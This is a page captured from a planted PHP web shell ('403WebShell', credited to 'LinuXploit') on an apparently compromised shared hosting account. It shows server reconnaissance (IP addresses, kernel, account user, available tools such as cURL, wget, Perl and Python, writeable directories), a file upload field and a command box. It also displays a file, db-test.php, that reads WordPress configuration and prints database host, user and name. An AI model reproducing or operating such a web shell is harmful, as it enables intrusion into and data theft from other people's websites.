Done ! 403WebShell
403Webshell
Server IP : 51.91.236.255  /  Your IP : 216.73.217.69
Web Server : Apache
System : Linux webm003.cluster129.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : chloega ( 433239)
PHP Version : 8.4.22
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/c/h/l/chloega/www/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/c/h/l/chloega/www//db-test.php
<?php
require_once __DIR__ . '/wp-config.php';

$mysqli = @new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if ($mysqli->connect_error) {
  echo "Connexion DB KO\n";
  echo "Host: " . DB_HOST . "\n";
  echo "User: " . DB_USER . "\n";
  echo "DB: " . DB_NAME . "\n";
  echo "Erreur: " . $mysqli->connect_error . "\n";
} else {
  echo "Connexion DB OK\n";
  $mysqli->close();
}

Youez - 2016 - github.com/yon3zu
LinuXploit